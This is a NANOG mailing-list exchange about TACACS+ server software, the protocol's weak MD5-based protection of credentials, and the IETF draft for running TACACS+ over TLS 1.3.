On Wed, Sep 20, 2023 at 10:22 AM, Jim <mysi...@gmail.com> wrote:

> On Wed, Sep 20, 2023 at 11:16 AM Mike Lewinski via NANOG <nanog@nanog.org>
> wrote:
>
>> > https://www.shrubbery.net/tac_plus/
>> That tac_plus has python 2 dependencies and so has been removed from
>> Debian packages. That's not surprising given the last update was 2015 and
>> Python 2 was EOL in 2020: https://www.python.org/doc/sunset-python-2/
>
> Currently I favor this one which is still being actively developed:
>> https://www.pro-bono-publico.de/projects/tac_plus.html
>>
>
> Yes.   Well, on the plus side the TACACS protocol has not really changed
> in 30 years,
> Even the 2015 code could work provided you can compile its dependencies
> from sources, right...
>
> On the downside, for the command authorization use:
> TACACS+ provides little protection for messages between client and server;
>
> The protocol's MD5 crypto is so weak that routers using TACACS+ for
> authentication
> might as well just be piping over user credentials in the clear: it's
> barely any better.
>


Yes, but there is current work in the IETF OpsAWG WG to help address this:
https://datatracker.ietf.org/doc/draft-ietf-opsawg-tacacs-tls13/

This work was actually started many years ago, but got sidetracked — there
was no published standard for TACACS, and so we first published RFC8907 -
"The Terminal Access Controller Access-Control System Plus (TACACS+)
Protocol" <https://datatracker.ietf.org/doc/rfc8907/>, and this new
document largely says "Now just do that over TLS! kthxbye…"

Hopefully this draft will progress soon…
W


> Router operating systems still typically use only passwords with
> SSH, then those devices send the passwords over that insecure channel.  I
> have yet to
> see much in terms of routers capable to Tacacs+ Authorize  users based on
> users'
> openSSH certificate, Public key id,  or  ed2559-sk security key id, etc.
>
> In short..  unless you got a VPN or a dedicated secure link from every
> single device to
> its Tacacs server or an Experimental   implementation of TACACS+ over  TLS:
> I would suggest consider Using tools or scripts to distribute users and
> Authorizing configurations to
> devices as local authorization through secure protocols as favorable to
> those network authentication systems
> that transmit sensitive decisions and user data across the network using
> Insecure protocols.
>
> --
> -Jim
>

Reply via email to